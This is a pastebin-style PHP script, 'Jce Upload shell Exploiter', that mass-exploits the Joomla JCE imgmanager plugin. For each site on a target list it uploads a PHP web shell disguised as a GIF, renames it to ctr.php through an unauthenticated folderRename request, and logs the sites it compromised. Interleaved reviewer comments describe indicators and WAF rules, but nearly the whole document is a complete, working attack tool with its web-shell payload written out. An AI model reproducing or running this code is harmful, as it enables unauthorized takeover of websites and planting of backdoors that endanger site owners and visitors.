Jemb0t_IR3eng

jce shell upload

Apr 20th, 2019
<?php
// NOTE(review): this paste is a mass-exploitation script aimed at the Joomla
// JCE "imgmanager" plugin. It reads a list of site URLs from the command line,
// sends each site an unauthenticated upload request followed by a rename
// request (see jce_upload() below), and appends the URLs where the dropped
// file became reachable to rslt.txt. The comments in this file describe what
// the code does and which artifacts a defender can look for; they do not
// change its behaviour.
echo "
_____ _ _______ _____
/ ____| | | |__ __| | __ \
| | _ _| |__ ___ _ __| | ___ __ _ _ __ ___ | |__) |_____ __
| | | | | | '_ \ / _ \ '__| |/ _ \/ _` | '_ ` _ \| _ // _ \ \/ /
| |___| |_| | |_) | __/ | | | __/ (_| | | | | | | | \ \ (_) > <
\_____\__, |_.__/ \___|_| |_|\___|\__,_|_| |_| |_|_| \_\___/_/\_\
__/ |
|___/

Jce Upload shell Exploiter Coded By Dr.S4mom


\n";

// No execution time limit: the loop over the target list runs for as long as
// the list is.
set_time_limit (0);

// The content that gets written onto each target. It is a minimal web shell:
// an HTML upload form plus inline PHP that calls move_uploaded_file() into the
// current directory with no authentication at all. Finding this text on a web
// root is itself an indicator of compromise (grep for the MAX_FILE_SIZE hidden
// field next to move_uploaded_file, or for the marker string added to it in
// the loop below).
$up = '<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';

// Value sent as the JCE "upload-dir" form field, i.e. the folder (relative to
// the JCE file root) the upload is asked to land in.
$dir = "/";

// CLI usage: exactly one argument, a text file with one site URL per line.
if (!isset ($argv[1]))
die ("\nUsage : php {$argv[0]} list.txt\n");

if (!file_exists ($argv[1]))
die ("\n\"{$argv[1]}\" File Not Found !\n");

// One array element per line of the target list; line endings are kept here
// and stripped with trim() inside the loop.
$site = file ($argv[1]);


// Results are opened in append mode, so repeated runs accumulate in one file.
$file = fopen ("rslt.txt", "a");
// Name the uploaded file is renamed to. A stray "ctr.php" under a Joomla
// images directory is a file-system indicator for this tool.
$name = "ctr.php";

foreach ($site as $sites)
{
$sites = trim ($sites);
// The marker "by Dr.S4mom" is prepended to the payload; it is what the success
// check below searches for, so it doubles as a reliable content signature for
// the dropped file.
jce_upload ($sites, "by Dr.S4mom<br><br>".$up, $dir, $name); //upload as dz.gif & rename to .php

// Success check: a plain GET via file_get_contents() (a different client from
// the raw socket used for the POSTs) for the renamed file under
// images/stories/, the JCE default file root, with two fallback locations.
// Warnings are suppressed with @, so connection errors and "file not there"
// both end up in the "Not Vuln" branch. For log correlation, the per-target
// pattern is two POSTs to index.php?option=com_jce&task=plugin&plugin=imgmanager
// followed closely by a GET for the renamed file name.
if (preg_match ("/Dr.S4mom/i", @file_get_contents ("$sites/images/stories/$name")))
{
echo "Done -> $sites/images/stories/$name\n";
fwrite ($file, "$sites/images/stories/$name\n");
}
elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/images/$name")))
{
echo "Done -> $site/images/$name\n";
fwrite ($file, "$sites/images/$name\n");
}
elseif (preg_match ("/Dr.S4mom/i", @file_get_contents ("$site/$name")))
{
echo "Done -> $site/$name\n";
fwrite ($file, "$sites/$name\n");
}
else
echo "Not Vuln -> $sites\n";
}

fclose ($file);
/**
 * Sends the two raw HTTP requests that make up the exploit against one site.
 *
 * Request 1 is a multipart POST to the JCE imgmanager upload handler
 * (method=form&action=upload) that submits $content as a GIF-typed file named
 * dz.gif, with upload-overwrite=1 and upload-dir=$up_dir.
 * Request 2 is a JSON-style POST to the same component (version=156&format=raw,
 * header "X-Request: JSON") calling "fn":"folderRename" to rename the dropped
 * file to $rename. The rename step is what turns an image-looking upload into
 * a PHP file the web server will execute.
 *
 * Neither response is read (see send()), so this function cannot tell whether
 * the target accepted anything; the caller infers success by fetching the
 * renamed file afterwards.
 *
 * @param string $site    Target URL; only its host and path components are used
 * @param string $content Bytes written into the uploaded file
 * @param string $up_dir  Value for the JCE "upload-dir" form field
 * @param string $rename  File name passed as the second folderRename argument
 *
 * Detection notes (all values are hard-coded below and usable as signatures
 * for this specific tool): both request lines contain
 * option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager; the multipart
 * boundary is 41184676334; the User-Agent is a fixed Firefox 29 string; the
 * requests are HTTP/1.0 with "Connection: Close". Unauthenticated requests to
 * these endpoints, and any "folderRename" call whose target name ends in .php,
 * should be blocked at the WAF and alerted on. Keeping JCE current is the
 * underlying fix; the legacy handlers addressed here are presumably what newer
 * releases restrict to authenticated users (confirm against the vendor's
 * advisories).
 */
function jce_upload ($site, $content, $up_dir, $rename)
{
$host = parse_url ($site, PHP_URL_HOST);
$path = parse_url ($site, PHP_URL_PATH);

// A bare host in the list yields no path; treat it as the site root.
if (!$path)
$path = "/";

// Name used for the upload itself; the .gif extension and image/gif
// Content-Type below are presumably there to satisfy the uploader's
// extension/MIME filtering before the rename.
$name = "dz.gif";

// Multipart body: upload-dir, an empty Filedata part, upload-overwrite=1, the
// real Filedata part carrying $content, a stray "0" part, and action=upload.
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "$up_dir\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "1\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"$name\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--";

// Request 1: the upload. Everything in the request line after index.php is a
// usable detection string for an unauthenticated upload attempt.
$packet = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload HTTP/1.0\r\n";
$packet .= "Host: $host\r\n";
$packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
$packet .= $data;
$packet .= "\r\n";

send ($host, $packet);

// Request 2: rename dz.gif to $rename through the component's JSON interface.
// The original author lists the related handler names (folderRename, fileRename,
// fileCopy); only folderRename is used here. The literal
// {"fn":"folderRename","args":[...]} body is a strong signature for the
// rename step.
//folderRename
//fileRename
//fileCopy
$data = "json={\"fn\":\"folderRename\",\"args\":[\"$up_dir".$name."\",\"$rename\"]}";

$packet = "POST $path/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw HTTP/1.0\r\n";
$packet .= "Host: $host\r\n";
$packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
// Header the JSON interface is sent with; combine with the request line above
// for a low-false-positive rule.
$packet .= "X-Request: JSON\r\n";
$packet .= "Content-Length: ".strlen ($data)."\r\n\r\n";
$packet .= $data."\r\n\r\n";

send ($host, $packet);
}
  130.  
/**
 * Fire-and-forget delivery of one raw HTTP request.
 *
 * Opens a plain TCP connection to port 80 (no TLS, so HTTPS-only hosts are
 * never reached), writes $packet and closes. The response is never read and
 * the errno/errstr out-parameters ($x, $y) are discarded, so connection
 * failures are silent; the caller only learns of success indirectly by
 * fetching the dropped file later. The 3-second connect timeout bounds how
 * long an unreachable host can stall the target loop.
 *
 * @param string $host   Host name or IP to connect to
 * @param string $packet Complete HTTP request, headers and body, as raw bytes
 */
function send ($host, $packet)
{
if ($connect = @fsockopen ($host, 80, $x, $y, 3))
{
@fputs ($connect, $packet);
@fclose ($connect);
}
}
  139.  
  140. ?>